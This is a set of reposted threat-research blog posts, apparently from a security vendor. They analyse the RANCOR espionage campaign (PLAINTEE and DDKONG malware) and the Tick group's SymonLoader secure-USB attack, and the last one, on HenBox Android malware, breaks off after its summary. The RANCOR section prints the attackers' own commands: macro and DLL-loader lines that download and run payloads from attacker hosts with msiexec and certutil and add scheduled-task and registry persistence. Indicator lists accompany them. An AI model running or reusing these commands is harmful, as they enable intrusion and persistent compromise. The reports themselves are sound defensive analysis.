RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families

Throughout 2017 and 2018 Unit 42 has been tracking and observing a series of highly targeted attacks focused in South East Asia, building on our research into the KHRAT Trojan. Based on the evidence, these attacks appear to be conducted by the same set of attackers using previously unknown malware families. In addition, these attacks appear to be highly targeted in their distribution of the malware used, as well as the targets chosen. Based on these factors, Unit 42 believes the attackers behind these attacks are conducting their campaigns for espionage purposes.

We believe this group is previously unidentified and therefore have we have dubbed it “RANCOR”. The Rancor group’s attacks use two primary malware families which we describe in depth later in this blog and are naming DDKONG and PLAINTEE. DDKONG is used throughout the campaign and PLAINTEE appears to be new addition to these attackers’ toolkit.  Countries Unit 42 has identified as targeted by Rancor with these malware families include, but are not limited to:

  • Singapore
  • Cambodia
  • Thailand

We identified decoy files which indicate these attacks began with spear phishing messages but have not observed the actual messages. These decoys contain details from public news articles focused primarily on political news and events. Based on this, we believe the Rancor attackers were targeting political entities.  Additionally, these decoy documents are hosted on legitimate websites including a government website belonging to the Cambodia Government and in at least once case, Facebook.

The malware and infrastructure used in these attacks falls into two distinct clusters, which we are labeling A and B, that are linked through their use of the PLAINTEE malware and several “softer” linkages.

Linking the attacks

Building on our previous research into KHRAT Trojan, we have been monitoring KHRAT command and control domains. In February 2018, several KHRAT associated domains began resolving to the IP address 89.46.222[.]97. We made this IP the center of our investigation.

Examining passive DNS (pDNS) records from PassiveTotal revealed several domain names associated with this IP that mimic popular technology companies. One of these domains, facebook-apps[.]com, was identified in one of the malware samples associated with this IP address.

The following table depicts the two malware samples that are directly related to this IP address:

SHA256 Description Connection to IP

 

0bb20a9570a9b1e3a72203951268ffe83af6dcae7342a790fe195a2ef109d855 Loader C2 facebook-apps.com (resolves to 89.46.222.97)
c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d PLAINTEE Hosted on 89.46.222.97

Digging in further, the malware family we later named “PLAINTEE” appears to be quite unique with only six samples present in our data set.

Apart from one sample (c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d), we were able to link all PLAINTEE samples together by the infrastructure they use. The diagram in Figure 1 shows the samples, domains, IP addresses and e-mail addresses that we identified during our investigation (See Appendix B for more detail on these.) There is a clear split between Cluster A and Cluster B, with no infrastructure overlap between the two.

RANCOR_1

Figure 1 – Diagram showing the split of PLAINTEE samples across the two clusters of activity.

Our Investigation into both clusters further showed that they were both involved in attacks targeting organizations in South East Asia. Based on the use of the relatively unique PLAINTEE malware, the malware’s use of the same file paths on in each cluster, and the similar targeting, we have grouped these attacks together under the RANCOR campaign moniker.

Delivery & Loader mechanisms

For many of the samples we’ve been unable to identify how they were delivered to end victims; however, in three cases we were able to locate the files used to deliver the Trojan, which we found merited more investigation and are briefly discussed below.

Cluster A

Case 1: Delivery via document property macro – a789a282e0d65a050cccae66c56632245af1c8a589ace2ca5ca79572289fd483

 In our research we found at least one attack against a company leveraging a Microsoft Office Excel document with an embedded macro to launch the malware. Interestingly, the delivery document borrowed a technique which was publicized in late 2017 as being used by the Sofacy threat actors, embedding the main malicious code in a EXIF metadata property of the document.

By doing so, the main content of the macro itself (Figure 2) can be kept relatively simple, and the malicious’ codes small footprint can help enable evasion of automated detection mechanisms based on macro content.

RANCOR_2

Figure 2 – The entire contents of the macro

The ‘Company’ field in this case, contains the raw command that the attacker wishes to run, downloading and executing the next stage of the malware:

cmd /c set /p=Set v=CreateObject(^"Wscript.Shell^"):v.Run ^"msiexec /q /i
 http://199.247.6.253/ud^",false,0  
C:WindowsSystem32spooldriverscolortmp.vbs & schtasks /create /sc MINUTE 
/tn "Windows System" /tr "C:WindowsSystem32spooldriverscolortmp.vbs" 
/mo 2 /F & schtasks /create /sc MINUTE /tn "Windows System" /tr 
"C:WindowsSystem32spooldriverscolortmp.vbs" /mo 2 /RU SYSTEM /c set 
/p=Set v=CreateObject(^"Wscript.Shell^"):v.Run ^"msiexec /q /i 
http://199.247.6.253/ud^",false,0  
C:WindowsSystem32spooldriverscolortmp.vbs & schtasks /create /sc MINUTE 
/tn "Windows System" /tr "C:WindowsSystem32spooldriverscolortmp.vbs" 
/mo 2 /F & schtasks /create /sc MINUTE /tn "Windows System" /tr 
"C:WindowsSystem32spooldriverscolortmp.vbs" /mo 2 /RU SYSTEM

Cluster B
Case 2: Delivery via HTA Loader – 1dc5966572e94afc2fbcf8e93e3382eef4e4d7b5bc02f24069c403a28fa6a458

 In this case the attackers sent an HTML Application file (.hta) to targets most likely as an email attachment. When opened and then executed, the key components of the HTA file downloads and executes further malware from a remote URLand loads a decoy image hosted externally (Figure 3).

RANCOR_3

Figure 3 – The decoy image loaded when the .HTA file is executed.

The decoy in Figure 3 strongly suggests the attackers were conducting an attack against a political entity in Cambodia. The Cambodia National Rescue Party is a politically motivated opposition movement.

Case 3: Delivery via DLL Loader –
0bb20a9570a9b1e3a72203951268ffe83af6dcae7342a790fe195a2ef109d855

 We identified three unique DLL loaders during this analysis. The loaders are extremely simple with a single exported function and are responsible for executing a single command. An exemplar command is given below:

cmd /c Echo CreateObject("WScript.Shell").Run "msiexec /q /i 
http:\dlj40s.jdanief[.]xyz/images/word3.doc",0 
>%userProfile%AppDataLocalMicrosoftmicrosoft.vbs /c Echo 
CreateObject("WScript.Shell").Run "msiexec /q /i 
http:\dlj40s.jdanief[.]xyz/images/word3.doc",0 
>%userProfile%AppDataLocalMicrosoftmicrosoft.vbs
schtasks /create /sc MINUTE /tn "Windows Scheduled MaintenBa" /tr "wscript 
%userProfile%AppDataLocalMicrosoftmicrosoft.vbs" /mo 10 /F /create /sc 
MINUTE /tn "Windows Scheduled MaintenBa" /tr "wscript 
%userProfile%AppDataLocalMicrosoftmicrosoft.vbs" /mo 10 /F
cmd /c certutil.exe -urlcache -split -f 
http:\\dlj40s.jdanief[.]xyz/images/1.pdf C:ProgramData1.pdf&start 
C:ProgramData1.pdf /c certutil.exe -urlcache -split -f 
http:\\dlj40s.jdanief[.]xyz/images/1.pdf C:ProgramData1.pdf&start 
C:ProgramData1.pdf

In the above command, the malware is downloading and executing a payload and configuring it for persistent execution. In two of the three examples, the malware also downloads and opens a decoy PDF document hosted on a legitimate but compromised website. The decoy documents seen in these cases were related to Cambodian news articles, an example is shown in Figure 4 below.

RANCOR_4

Figure 4 – 1.pdf decoy delivered by downloader

The decoy above discusses a recent event that took place against political party supporters in Cambodia, a similar theme to the decoy document observed in Figure 3.

It is worth noting that the third DLL mentioned attempts to download the decoy document from a government website. This same website was used previously in a KHRat campaign targeting Cambodian citizens.

Additionally, two of the three DLL loaders were found to be hosted on this same compromised website, implying that it was likely compromised again in early 2018. The filenames for these two DLL loaders are as follows:

  • Activity Schedule.pdf
  • អ្នកនយោបាយក្បត់លើក្បត (Translated from Khmer: Politicians betrayed on the betrayal)

Malware Overview

In all cases where we were able to identify the final payloads used, the DDKONG  or PLAINTEE malware families were used. We observed DDKONG in use between February 2017 and the present, while PLAINTEE is a newer addition with the earliest known sample being observed in October 2017. It’s unclear if DDKONG is only used by one threat actor or more than one based on the data available.

In this section we’ll go over the capabilities and operation of these malware families.

DDKONG
For the analysis below, we used the following file:

SHA256 119572fafe502907e1d036cdf76f62b0308b2676ebdfc3a51dbab614d92bc7d0
SHA1 25ba920cb440b4a1c127c8eb0fb23ee783c9e01a
MD5 6fa5bcedaf124cdaccfa5548eed7f4b0
Compile Time 2018-03-14 07:20:11 UTC
File Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

Table 1 – DDKONG sample analyzed in full.

The malware in question is configured with the following three exported functions:

  • ServiceMain
  • Rundll32Call
  • DllEntryPoint

The ServiceMain exported function indicates that this DLL is expected to be loaded as a service. If this function is successfully loaded, it will ultimately spawn a new instance of itself with the Rundll32Call export via a call to rundll32.exe.

The Rundll32Call exported function begins by creating a named event named ‘RunOnce’. This event ensures that only a single instance of DDKong is executed at a given time. If this is the only instance of DDKong running at the time, the malware continues. If it’s not, it dies. This ensures that only a single instance of DDKong is executed at a given time.

DDKong attempts to decode an embedded configuration using a single byte XOR key of 0xC3. Once decoded, the configuration contains the data shown in Figure 5 below.

RANCOR_5

Figure 5 – Decoded configuration with fields highlighted

After this configuration is decoded and parsed, DDKONG proceeds to send a beacon to the configured remote server via a raw TCP connection. The packet has a header of length 32 and an optional payload. In the beacon, no payload is provided, and as such, the length of this packet is set to zero.

RANCOR_6

Figure 6 – DDKONG beacon to remote C2

After it sends the beacon, the malware expects a response command of either 0x4 or 0x6. Both responses instruct the malware to download and load a remote plugin. In the event 0x4 is specified, the malware is instructed to load the exported ‘InitAction’ function. If 0x6 is specified, the malware is instructed to load the exported ‘KernelDllCmdAction’ function. Prior to downloading the plugin, the malware downloads a buffer that is concatenated with the embedded configuration and ultimately provided to the plugin at runtime. An example of this buffer at runtime is below:

00000000: 43 3A 5C 55 73 65 72 73  5C 4D 53 5C 44 65 73 6B  C:UsersMSDesk

00000010: 74 6F 70 5C 52 53 2D 41  54 54 20 56 33 5C 50 6C  topRS-ATT V3Pl

00000020: 75 67 69 6E 42 69 6E 00  00 00 00 00 00 00 00 00  uginBin………uginBin………

[TRUNCATED]

00000100: 00 00 00 00 43 3A 5C 55  73 65 72 73 5C 4D 53 5C  ….C:UsersMS

00000110: 44 65 73 6B 74 6F 70 5C  52 53 2D 41 54 54 20 56  DesktopRS-ATT V

00000120: 33 5C 5A 43 6F 6E 66 69  67 00 00 00 00 00 00 00  3ZConfig…….ZConfig…….

[TRUNCATED]

00000200: 00 00 00 00 00 00 00 00  00 40 00 00 F0 97 B5 01  ………@……

As we can see in the above text, two full file paths are included in this buffer, providing us with insight into the original malware family’s name, as well as the author. After this buffer is collected, the malware downloads the plugin and loads the appropriate function. During runtime, the following plugin was identified:

SHA256 0517b62233c9574cb24b78fb533f6e92d35bc6451770f9f6001487ff9c154ad7
SHA1 03defdda9397e7536cf39951246483a0339ccd35
MD5 a5164c686c405734b7362bc6b02488cb
Compile Time 2018-03-28 01:54:40 UTC
File Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

Table 2 – Plugin downloaded during runtime for DDKong sample.DDKong sample.

This plugin provides the attacker with the ability to both list files and download/upload files on the victim machine.

PLAINTEE

In total we have been able to find six samples of PLAINTEE, which, based on our analysis, seems to be exclusively used by the RANCOR attackers. PLAINTEE is unusual in that it uses a custom UDP protocol for its network communications. For this walk through, we use the following sample:

SHA256 c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d
SHA1 0bdb44255e9472d80ee0197d0bfad7d8eb4a18e9
MD5 d5679158937ce288837efe62bc1d9693
Compile Time 2018-04-02 07:57:38 UTC
File Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

Table 3 – PLAINTEE sample analyzed in full.

This sample is configured with three exported functions:

  • Add
  • Sub
  • DllEntryPoint

The DLL expects the export named ‘Add’ to be used when initially loaded. When this function is executed PLAINTEE executes the following command in a new process to add persistence:

cmd.exe /c reg add "HKEY_CURRENT_USERSoftwareMicrosoftWindows 
CurrentVersionRunOnce" /v "Microsoft Audio" /t REG_SZ /d "%APPDATA%Network 
Service.exe" "[path_to_PLAINTEE]",Add /freg add 
"HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersionRunOnce" /v 
"Microsoft Audio" /t REG_SZ /d "%APPDATA%Network Service.exe" 
"[path_to_PLAINTEE]",Add /f

Next, the malware calls the ‘Sub’ function which begins by spawning a mutex named ‘microsoftfuckedupb’ to ensure only a single instance is running at a given time. In addition, PLAINTEE will create a unique GUID via a call to CoCreateGuid() to be used as an identifier for the victim. The malware then proceeds to collect general system enumeration data about the infected machine and enters a loop where it will decode an embedded config blob and send an initial beacon to the C2 server.

The configuration blob is encoded using a simple single-byte XOR scheme. The first byte of the string is used as the XOR key to in turn decode the remainder of the data.

Decoding this blob yields the following information, also found within the original binary:

Offset Description
0x4 C2 port (0x1f99 – 8089)
0x8 C2 host (45.76.176[.]236)
0x10C Flag used to identify the malware in network communications. (default flag:4/2/2018 1:01:33 AM)

Table 4 – Configuration stored in the malware.

The malware then proceeds to beacon to the configured port via a custom UDP protocol. The network traffic is encoded in a similar fashion, with a random byte being selected as the first byte, which is then used to decode the remainder of the packet via XOR.  An example of the decoded beacon is show in Figure 7.

RANCOR_7

Figure 7 PLAINTEE example beacon

The structure for this beacon is given in Table 5.

Offset Description
0x0 Victim GUID (8C8CEED9-4326-448B-919E-249EEC0238A3)
0x25 Victim IP Address (192.168.180.154)
0x45 Command (0x66660001)
0x49 Length of payload (0x2f – 47)
0x4d Field 1 – Windows major version (0x6 – Windows Vista+)
0x51 Field 2 – Windows minor version (0x1 – Windows 7)
0x55 Field 3 – Unknown (0x20)
0x59 Payload (default flag:4/2/2018 1:01:33 AM)

Table 5 – Beacon structure for PLAINTEE.

This beacon is continuously sent out until a valid response is obtained from the C2 server (there is no sleep timer set). After the initial beacon, there is a two second delay in between all other requests made. This response is expected to have a return command of 0x66660002 and to contain the same GUID that was sent to the C2 server. Once this response is received, the malware spawns several new threads, with different Command parameters, with the overall objective of loading and executing a new plugin that is to be received from the C2 server.

During a file analysis of PLAINTEE in WildFire, we observed the attackers download and execute a plugin during the runtime for that sample. The retrieved plugin was as follows:

SHA256 b099c31515947f0e86eed0c26c76805b13ca2d47ecbdb61fd07917732e38ae78
SHA1 ac3f20ddc2567af0b050c672ecd59dddab1fe55e
MD5 7c65565dcf5b40bd8358472d032bc8fb
Compile Time 2017-09-25 00:54:18 UTC
File Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

Table 6 – PLAINTEE plugin observed in Wildfire

PLAINTEE expects the downloaded plugin to be a DLL with an export function of either ‘shell’ or ‘file’. The plugin uses the same network protocol as PLAINTEE and so we were able to trivially decode further commands that were sent.  The following commands were observed:

  • tasklist
  • ipconfig /all

The attacker performed these two commands 33 seconds apart. As automated commands are typically performed more quickly this indicates that they may have been sent manually by the attacker.

Conclusions

The RANCOR campaign represents a continued trend of targeted attacks against entities within the South East Asia region. In a number of instances, politically motivated lures were used to entice victims into opening and subsequently loading previously undocumented malware families. These families made use of custom network communication to load and execute various plugins hosted by the attackers. Notably the PLAINTEE malwares’ use of a custom UDP protocol is rare and worth considering when building heuristics detections for unknown malware. Palo Alto Networks will continue to monitor these actors, their malware, and their infrastructure going forward.

Palo Alto Networks customers are protected against the threats discussed in this blog in the following ways:

  • Wildfire correctly identifies all samples discussed as malicious.
  • Traps appropriately blocks the malware from executing.
  • AutoFocus customers may track this threat via the KHRAT, DDKONG, PLAINTEE, and RANCOR tags.

Additional mitigations that could help to prevent attacks like these from succeeding in your environment include:

  • Changing the default handler for “.hta” files in your environment so that they cannot be directly executed.hta” files in your environment so that they cannot be directly executed.

Appendix A – PLAINTEE older variant
Older variants of PLAINTEE can be identified via the unique mutex created during runtime. At least three variants of PLAINTEE have been identified to date, however, the following two samples have additional unique differences:

Hash Functions Mutex
bcd37f1d625772c162350e5383903fe8dbed341ebf0dc38035be5078624c039e helloworld
helloworld1helloworld2sqmAddTostreamDllEntryPoint
microsoftfuckedup
6aad1408a72e7adc88c2e60631a6eee3d77f18a70e4eee868623588612efdd31

The following actions are performed with the additional functions:

  • helloworld – performs actions identical to the newer sample’s ‘Sub’ function
  • helloworld1 – accepts command-line arguments, performs a UAC bypass
  • helloworld2 – drops and compiles a mof filemof file
  • sqmAddTostream – expected to run initially by the malware, checks OS version and loads the malware with helloworld2 – expected to run initially by the malware, checks OS version and loads the malware with helloworld2

Appendix B

Type Value Cluster
Loaders
Hash 0bb20a9570a9b1e3a72203951268ffe83af6dcae7342a790fe195a2ef109d85 B
Hash 1dc5966572e94afc2fbcf8e93e3382eef4e4d7b5bc02f24069c403a28fa6a458 B
Domain www.facebook-apps.com B
Domain dlj40s.jdanief.xyz B
IP 89.46.222.97 B
Hash a789a282e0d65a050cccae66c56632245af1c8a589ace2ca5ca79572289fd483 A
PLAINTEE
Hash 863a9199decf36895d5d7d148ce9fd622e825f393d7ebe7591b4d37ef3f5f677 A
Hash 22a5bd54f15f33f4218454e53679d7cfae32c03ddb6ec186fb5e6f8b7f7c098b A
Hash c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d B
IP 199.247.6.253 A
IP 45.76.176.236 A
Mutex microsoftfuckedupb A
Hash 9f779d920443d50ef48d4abfa40b43f5cb2c4eb769205b973b115e04f3b978f5 A
Hash bcd37f1d625772c162350e5383903fe8dbed341ebf0dc38035be5078624c039e A
Hash 6aad1408a72e7adc88c2e60631a6eee3d77f18a70e4eee868623588612efdd31 A
Hash b099c31515947f0e86eed0c26c76805b13ca2d47ecbdb61fd07917732e38ae78 A
Domain goole.authorizeddns.us A
Mutex Microsoftfuckedup A
IP 103.75.189.74 A
IP 131.153.48.146 A
DDKONG
Hash 15f4c0a589dff62200fd7c885f1e7aa8863b8efa91e23c020de271061f4918eb A
Domain microsoft.authorizeddns.us A
IP 103.75.191.177 A
Hash 0f102e66bc2df4d14dc493ba8b93a88f6b622c168e0c2b63d0ceb7589910999d A
Hash 84607a2abfd64d61299b0313337e85dd371642e9654b12288c8a1fc7c8c1cf0a A
Hash a725abb8fe76939f0e0532978eacd7d4afb4459bb6797ec32a7a9f670778bd7e A
Hash 82e1e296403be99129aced295e1c12fbb23f871c6fa2acafab9e08d9a728cb96 A
Hash 9996e108ade2ef3911d5d38e9f3c1deb0300aa0a82d33e36d376c6927e3ee5af A
Domain www.google_ssl.onmypc.org A
Hash 18e102201409237547ab2754daa212cc1454f32c993b6e10a0297b0e6a980823 A
IP 103.75.191.75 A
Hash c78fef9ef931ffc559ea416d45dc6f43574f524ba073713fddb79e4f8ec1a319 A
Hash 01315e211bac543195f2c703033ba31b229001f844854b147c4b2a0973a7d17b A
Hash b8528c8e325db76b139d46e9f29835382a1b48d8941c47060076f367539c2559 A
Hash df14de6b43f902ac8c35ecf0582ddb33e12e682700eb55dc4706b73f5aed40f6 A
Hash 177906cb9170adc26082e44d9ad1b3fbdcba7c0b57e28b614c1b66cc4a99f906 A
Hash 113ae6f4d6a2963d5c9a7f42f782b176da096d17296f5a546433f7f27f260895 A
Domain ftp.chinhphu.ddns.ms A
Hash 128adaba3e6251d1af305a85ebfaafb2a8028eed3b9b031c54176ca7cef539d2 A
Domain www.microsoft.https443.org A
IP 45.121.146.26 A
Hash 5afbee76af2a09c173cf782fd5e51b5076b87f19b709577ddae1c8e5455fc642 A
Domain msdns.otzo.com A
Hash 119572fafe502907e1d036cdf76f62b0308b2676ebdfc3a51dbab614d92bc7d0 A
Domain goole.authorizeddns.us A
IP 103.75.189.74 A

The post RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families appeared first on Palo Alto Networks Blog.

Go to Source
Author: Brittany Ash

Tick Group Weaponized Secure USB Drives to Target Air-Gapped Critical Systems

Summary

Tick is a cyberespionage group primarily targeting organizations in Japan and the Republic of Korea. The group is known to conduct attack campaigns with various custom malware such as Minzen, Datper, Nioupale (aka Daserf), and HomamDownloader. Unit 42 last wrote about the Tick group in July 2017.

Recently, Palo Alto Networks Unit 42 discovered the Tick group targeted a specific type of secure USB drive created by a South Korean defense company. The USB drive and its management system have various features to follow security guidelines in South Korea.

The weaponization of a secure USB drive is an uncommon attack technique and likely done in an effort to spread to air-gapped systems, which are systems that do not connect to the public internet. In addition, our research shows that the malware used in these attacks will only try to infect systems running Microsoft Windows XP or Windows Server 2003. This is despite the fact that the malware appears to have been created when newer versions of Windows software were available. This would seem to indicate an intentional targeting of older, out-of-support versions of Microsoft Windows installed on systems with no internet connectivity. Air-gapped systems are common practice in many countries for government, military, and defense contractors, as well as other industry verticals.

We have not identified any public reporting on this attack, and we suspect the Tick group used the malware described in this report in attacks multiple years ago. Based on the data collected, we do not believe this malware is part of any active threat campaign.

Our picture of this past attack is incomplete at this time. Based on our research thus far, we are able to sketch out the following hypothesized attack scenario:

  1. The Tick Group somehow compromised a secure type of USB drive and loaded a malicious file onto an unknown number of them. These USB drives are supposed to be certified as secure by the South Korean ITSCC (English).
  2. The Tick Group created a specific malware we are calling SymonLoader that somehow gets on older Windows systems and continuously looks for these specific USB drives.
  3. SymonLoader specifically targets Windows XP and Windows Server 2003 systems ONLY.
  4. If SymonLoader detects the presence of a specific type of secure USB drive, it will attempt to load the unknown malicious file using APIs that directly access the file system.

In the research below, we outline our findings around SymonLoader. We do not currently have either a compromised USB drive nor the unknown malicious file we believe is implanted on these devices. Because of this we are unable to describe the full attack sequence.

Because we do not have either a compromised USB drive or the unknown malicious file, we are also unable to determine how these USB drives have been compromised. Specifically, we do not know if there has been a successful compromise in the supply-chain making these devices, or if these have been compromised post-manufacturing and distributed using other means such as social engineering.

Tick and Trojanized Legitimate Software

Unit 42 hasn’t identified the initial delivery method; the overview of the infection process is shown below in Figure 1.

tick_1

Figure 1 Infection process

First, the attacker tricks users with a Trojanized version of legitimate software to install the loader program, which is a new tool to Tick we’ve named “SymonLoader”.

When executed, the loader starts monitoring storage device changes on a compromised machine. If SymonLoader detects the targeted type of secure USB drive, it attempts to access the storage through the device driver corresponding to the secure USB and checks for strings specific to one type of secure USB in the drive information fields. Then, it accesses a predefined location of the storage on the USB and extracts an unknown PE file.

As we described in a previous blog last July, the Tick group Trojanized a legitimate program and embedded malware called HomamDownloader. The attackers then sent the Trojanized legitimate applications as attachments to spear phishing email targets. When executed, the Trojanized legitimate application drops HomamDownloader and installs the legitimate program. Recipients may not be aware of the malware as the legitimate application works as expected.

In our research into these latest attacks, we found additional legitimate Trojanized Korean language software since publishing out blog last year (Table 1). Similar to the previous samples we examined in July 2017, these newly Trojanized legitimate programs also drop HomamDownloader. Also like we saw in our July 2017 research, HomamDownloader can install other malicious files from the remote C2 server; in this case, pre.englandprevail[.]com.

Trojanized Legitimate Software SHA256
Movie Player installer b1bb1d5f178b064eb1d7c9cc7cadcf8b3959a940c14cee457ce3aba5795660aa
Industrial battery monitoring software 3227d1e39fc3bc842245ccdb16eeaadad3bcd298e811573b2e68ef2a7077f6f6
Storage encryption software 92e0d0346774127024c672cc7239dd269824a79e85b84c532128fd9663a0ce78
File encryption software 33665d93ab2a0262551c61ec9a3adca2c2b8dfea34e6f3f723274d88890f6ceb

Table 1 Trojanized Korean programs

During our investigation, we found an interesting sample on January 21, 2018 (Table 2). Similar to the samples listed above, this sample is a Trojanized version of a legitimate program and drops malware. In this case, the Trojanized application is a Japanese language GO game. Instead of installing HomamDownloader like we observed in July 2017, this Trojanized program installs a new loader we’ve named SymonLoader.

SymonLoader extracts a hidden executable file from a specific type of secure USB drive and executes it on the compromised system. Unfortunately, we do not have a copy of this file.

Trojanized Legitimate Software SHA256
GO Game 8549dcbdfc6885e0e7a1521da61352ef4f084d969dd30719166b47fdb204828a

Table 2 Trojanized Japanese language program

Despite the differences from previous samples, we believe this sample is related to the Tick group because the shellcode in the Trojanized Japanese game is exactly the same as that found in the Trojanized Korean programs described earlier. Also, SymonLoader shares code with HomamDownloader (Figure 2). The Tick group is known to develop and consistently update custom tools. As such, code reuse like this is consistent with their development practices.

tick_2

Figure 2 Sharing code between SymonLoader and HomamDownloader

Secure USB

SymonLoader first checks the operating system version of the target host and if it is newer than Windows XP or Windows Server 2003, it stops working. According to the timedate stamp in the PE header, the malware was created on 26 September 2012. Both Windows 7 and Windows Server 2008 were already released by then if the timedate value is not modified.

After checking the OS version, SymonLoader creates a hidden window named “device monitor” that starts monitoring storage device changes on the compromised system. When a removable drive is connected the malware checks the drive letter and drive type. If the drive letter is not A or B, and the drive type is not a CDROM the malware calls CreateFile API and gets a handle to the storage device.  By excluding drives A and B (typically used for floppy drives) and CDROM drive types, it appears likely that the malware is targeting removable USB drives.

Next, the malware calls the DeviceIoControl() function with an undocumented custom control code, 0xE2000010 (Figure 3). The control code consists of four different types of values; DeviceType, Function, Access, and Method. In this case, the DeviceType value is 0xE200 computed as: (0x0E2000010 & 0xffff0000)>>0x10.   According to Microsoft, this specific DeviceType value should be in the range for third-party vendors. To function properly, the third-party driver needs to be present on the compromised system before the malware calls DeviceIoControl() with the custom control code 0xE2000010. But which third-party driver? There is a clue in the next function.

tick_3

Figure 3 DeviceIoControl with custom IoControlCode

SymonLoader gets device information by SCSI INQUIRY command using the IOCTL_SCSI_PASS_THROUGH parameter and determines if it is the targeted drive by searching for a specific string in the Vendor or Product identification on INQUIRY data. Our research into the string used in these searches showed a company in the South Korea Defense Industry whose name matched the string. This company develops information and communication security equipment used by military, police, government agencies and public institutions. In a press, this company announced that they make secure USB storage devices that are certified to meet security requirements set out by South Korea’s IT Security Certification Center (ITSCC (English)). In South Korea, certain organizations are required to follow the “USB storage medium guideline” and using only the devices passed the audit by the government agency. For example, the guideline of the Ministry of Unification of South Korea defines the USB memory and management system introduction procedure at section 4, item 1 (Figure 4).

tick_4

Figure 4 USB memory introduction procedure

Google translation from Korean to English follows.

“According to ‘Guidelines for Security Management of Auxiliary Storage Media such as USB Memory’, the headquarters security officer shall request the National Intelligence Service to verify the security compliance to introduce USB memory.”

We found the third-party device driver in question in the installer of the secure USB drive in a public sample repository, and confirmed it supports the custom control code, 0xE2000010. The driver provides some functions to applications, including access to the corresponding secure USB volumes. We feel this evidence shows that the malware attempts to work only on the secure USB product made by this particular company.

Loading Hidden Module

If SymonLoader finds it is on a Windows XP or Windows Server 2003 system and finds that a newly attached device is a USB drive made by this particular company, then it will extract an unknown executable file from the USB. While we do not have this file, we can glean information about it by analyzing SymonLoader and the third-party driver. The attacker encrypted the unknown executable file and concealed it at the ending part of the secure USB storage in advance. The hidden data is not accessible through logical file operation APIs, such as ReadFile(). Instead, SymonLoader uses Logical Block Addressing(LBA) and SCSI commands to read the data physically from the particular expected location on the removable drive.

LBA is a simple linear addressing scheme. Storage is divided into blocks by fixed size, and each block has a number starting from zero to N-1, depends on the volume size. Applications can specify the block number and access the data by SCSI commands.

Finally, SymonLoader saves the extracted file in the temporary directory on the local disk and executes it. The procedure is as follows:

  1. Obtains final Logical Block Address(LBA) of the storage “N-1” by using the READ CAPACITY (10) command.
  2. Read the third last block “N-3” by READ (10) command and decrypts it.
  3. From the decrypted data, gets the LBA “X” where the main module locates.
  4. Loads data from LBA “X” to “N-4” by READ (10) command and decrypts it.
  5. Saves the decrypted file as %Temp%[random characters].tmp and execute it.
  6. Writes hostname and local time of the compromised system at LBA “N-2” by SAVE (10) command.

Figure 5 shows the data layout of the malicious storage from the perspective of Logical Block Addressing.

tick_5

Figure 5 Data layout on the malicious storage

Conclusion

The Tick group uses Trojanized legitimate applications to trick victims into installing first stage malware, mostly HomamDownloader. In this research, we identified a previously unknown loader malware being dropped instead of HomamDownloader, which was most likely used in attacks multiple years ago. In contrast to HomamLoader, which requires an Internet connection to reach its C2 server to download additional payloads, SymonLoader attempts to extract and install an unknown hidden payload from a specific type of secure USB drive when it’s plugged into a compromised system. This technique is uncommon and hardly reported among other attacks in the wild.

While we do not have a copy of the file hidden on the secure USB, we have more than enough information to determine it is more than likely malicious. Weaponizing a secure USB drive is an uncommon technique and likely done in an effort to compromise air-gapped systems, which are systems that do not connect to the public internet. Some industries or organizations are known for introducing air gapping for security reasons. In addition, outdated versions Operating Systems are often used in those environments because of no easy-update solutions without internet connectivity. When users are not able to connect to external servers, they tend to rely on physical storage devices, particularly USB drives, for data exchange. The SymonLoader and secure USB drive discussed in this blog may fit for this circumstance.

Palo Alto Networks customers are protected from these threats in the following ways:

  1. All samples discussed are classified as malicious by the WildFire sandbox platform.
  2. All identified domains have been classified as malicious.
  3. AutoFocus users can track the malware described in this report using Tick campaign tag, SymonLoader and HomamDownloader malware tags.
  4. Customers running Traps are protected from the discussed threats.

IoCs

SymonLoader

Malformed Legitimate software SHA256
8549dcbdfc6885e0e7a1521da61352ef4f084d969dd30719166b47fdb204828a

SysmonLoader SHA256
31aea8630d5d2fcbb37a8e72fe4e096d0f2d8f05e03234645c69d7e8b59bb0e8

Mutex
SysMonitor_3A2DCB47

File Path
%ProgramFiles%Windows NTAccessoriesMicrosoftmsxml.exe
%UserProfile%ApplicationsMicrosoftmsxml.exe

Registry Entry
HKLMSoftwareMicrosofWindowsCurrentVersionrun”xml” = %ProgramFiles%Windows NTAccessoriesMicrosoftmsxml.exe

HKCUSoftwareMicrosofWindowsCurrentVersionrun”xml” = %UserProfile%ApplicationsMicrosoftmsxml.exe

HomamDownloader

Trojanized Legitimate Software SHA256
b1bb1d5f178b064eb1d7c9cc7cadcf8b3959a940c14cee457ce3aba5795660aa

3227d1e39fc3bc842245ccdb16eeaadad3bcd298e811573b2e68ef2a7077f6f6

92e0d0346774127024c672cc7239dd269824a79e85b84c532128fd9663a0ce78

33665d93ab2a0262551c61ec9a3adca2c2b8dfea34e6f3f723274d88890f6ceb

HomamDownloader SHA256
019874898284935719dc74a6699fb822e20cdb8e3a96a7dc8ec4f625e3f1116e

ee8d025c6fea5d9177e161dbcedb98e871baceae33b7aa12e9f73ab62bb0e38

f817c9826089b49d251b8a09a0e9bf9b4b468c6e2586af60e50afe48602f0bec

C2 of HomamDownloader
pre.englandprevail[.]com

The post Tick Group Weaponized Secure USB Drives to Target Air-Gapped Critical Systems appeared first on Palo Alto Networks Blog.

Go to Source
Author: Kaoru Hayashi

HenBox: Inside the Coop

Summary

On March 13, 2018, we published a blog describing a new Android malware family we discovered and called “HenBox” based on metadata found in most of the malicious apps. HenBox apps masquerade as others such as VPN apps, and Android system apps; some apps carry legitimate versions of other apps which they drop and install as a decoy technique. While some of legitimate apps HenBox uses as decoys can be found on Google Play, HenBox apps themselves are found only on third-party (non-Google Play) app stores.

HenBox apps appear to primarily target the Uyghurs – a Turkic ethnic group living mainly in the Xinjiang Uyghur Autonomous Region in North West China.

